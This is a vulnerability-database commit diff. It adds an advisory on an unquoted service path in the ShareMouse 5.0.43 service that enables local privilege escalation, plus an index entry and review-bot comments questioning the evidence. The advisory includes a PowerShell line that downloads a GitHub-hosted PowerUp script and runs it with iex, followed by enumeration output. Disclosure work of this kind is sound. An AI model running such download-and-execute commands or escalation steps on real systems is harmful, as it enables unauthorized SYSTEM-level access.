DB: 2020-09-09

1 changes to exploits/shellcodes

ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
Offensive Security 2020-09-09 05:02:07 +00:00
parent f288c52ef9
commit 39b0da41ed
2 changed files with 26 additions and 0 deletions


@ -0,0 +1,25 @@
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041
PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks
ServiceName : ShareMouse Service
Path : C:\Program Files (x86)\ShareMouse\smService.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>
PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
AcceptStop DisplayName PathName StartName
TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
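Review bot: The "#Exploit:" comment at the end of the file asserts that a local user can place code "in the system root path", but nothing in the evidence above it shows that any directory along the service path is writable by an unprivileged account. The PowerUp and wmic output establish only that PathName is C:\Program Files (x86)\ShareMouse\smService.exe without quotes and that the service starts as LocalSystem. Suggest recording which directory's permissions were checked and what they were, so a reader can judge whether a default install is affected, and stating the fix (quoting the service's binary path). Separately, the first PS line pipes a script from the master branch of a GitHub repository into iex, so the steps run whatever that branch serves at the time; naming the tool and a fixed revision would make the reproduction stable.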


@ -10374,6 +10374,7 @@ id,file,description,date,author,type,platform,port
42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows,
42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows,
48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows,
48794,exploits/windows/local/48794.txt,"ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path",2020-09-08,alacerda,local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
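Review bot: The new 48794 row sits between 48790 and 42887, and the surrounding rows are in ascending order by neither the id nor the date column, so the ordering rule for this file cannot be confirmed from these lines; please check the insertion point against whatever key the index is actually sorted on. The date field 2020-09-08 matches the "Discovery Date" in the entry's header rather than the 2020-09-09 commit date, so confirm which of the two the column is meant to hold. The author field carries only the handle alacerda, while the entry header gives "Alan Lacerda (alacerda)".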
